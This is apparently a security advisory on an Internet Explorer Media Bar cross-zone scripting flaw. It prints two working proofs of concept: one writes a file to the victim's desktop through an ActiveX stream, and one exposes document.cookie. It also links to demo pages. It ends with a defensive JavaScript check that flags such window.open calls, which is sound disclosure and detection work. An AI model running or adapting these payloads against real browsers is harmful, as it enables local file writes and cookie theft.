Microsoft Internet Explorer window.open Media Bar Cross-Zone Scripting Vulnerability
The following proof of concept has been supplied:

<script>
// '\\42' -> '\42' -> ' " '
img_src='javascript:file = \\42Exploit.txt\\42; o = new ActiveXObject(\\42ADODB.Stream\\42);'
  + ' o.Open(); o.Type=2; o.Charset=\\42ascii\\42; o.WriteText(\\42My name is Cheng Peng Su.\\42);'
  + ' o.SaveToFile(file, 2); o.Close(); alert(\\42I wanna create \\42+file+\\42 on your desktop!\\42);';
inject_html="<img src='" + img_src + "'>";
window.open('file:javascript:document.write("' + inject_html + '")','_media');
</script>

Additional proof of concept for cross site scripting has been supplied as well:

<script>
window.open("http://www.google.com/","_media")
setTimeout(function(){
  window.open("file:javascript:alert(document.cookie);","_media")
},5000);
</script>

Proof-of-concept demos are available at the following locations:

http://www.freewebs.com/applesoup/CrossMediaBar/demo.html
http://www.freewebs.com/applesoup/CrossMediaBar/CrossSite.htm

The original proof-of-concept is available at the following location:

http://ip3e83566f.speed.planet.nl/hacked-by-chinese/5.htm
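A defensive static check built from the two traits both proofs of concept above share, a window.open call with the "_media" target and a "file:javascript:" URL. This is an added example, not part of the original advisory; the function names, rule labels and sample input are assumptions constructed for illustration.

```javascript
// Triage heuristic (hypothetical names). Comments and regex literals in the
// scanned source are not parsed, so treat hits as leads, not verdicts.

// Collect the top-level argument text of every window.open(...) call.
function windowOpenArgs(src) {
  const marker = "window.open(", calls = [];
  let at = src.indexOf(marker);
  while (at !== -1) {
    const args = [];
    let depth = 0, quote = null, cur = "", i = at + marker.length;
    for (; i < src.length; i++) {
      const ch = src[i];
      if (quote) {                              // inside a string literal
        cur += ch;
        if (ch === "\\") cur += src[++i] || ""; // keep the escaped char as-is
        else if (ch === quote) quote = null;
      } else if (ch === "'" || ch === '"') { quote = ch; cur += ch; }
      else if (ch === "(") { depth++; cur += ch; }
      else if (ch === ")" && depth > 0) { depth--; cur += ch; }
      else if (ch === ")") break;               // end of this window.open call
      else if (ch === "," && depth === 0) { args.push(cur.trim()); cur = ""; }
      else cur += ch;
    }
    args.push(cur.trim());
    calls.push(args);
    at = src.indexOf(marker, i);
  }
  return calls;
}

// Flag calls that target "_media" and/or pass a literal file:javascript: URL.
function flagMediaBarOpens(src) {
  const findings = [];
  for (const [url = "", target = ""] of windowOpenArgs(src)) {
    const reasons = [];
    if (/^(['"])_media\1$/i.test(target)) reasons.push("target-_media");
    if (/^['"]\s*file:javascript:/i.test(url)) reasons.push("file-javascript-url");
    if (reasons.length) findings.push({ url, reasons });
  }
  return findings;
}

// Constructed sample input, not taken from a real site.
const SAMPLE = `
window.open("http://example.com/", "_blank");
window.open("http://example.com/", "_media");
window.open('file:javascript:document.write("' + html + '")', '_media');
`;
console.log(flagMediaBarOpens(SAMPLE));
```

A hit on "target-_media" alone marks a page that opens content in the Media Bar; the combination with "file-javascript-url" is the shape both proofs of concept use.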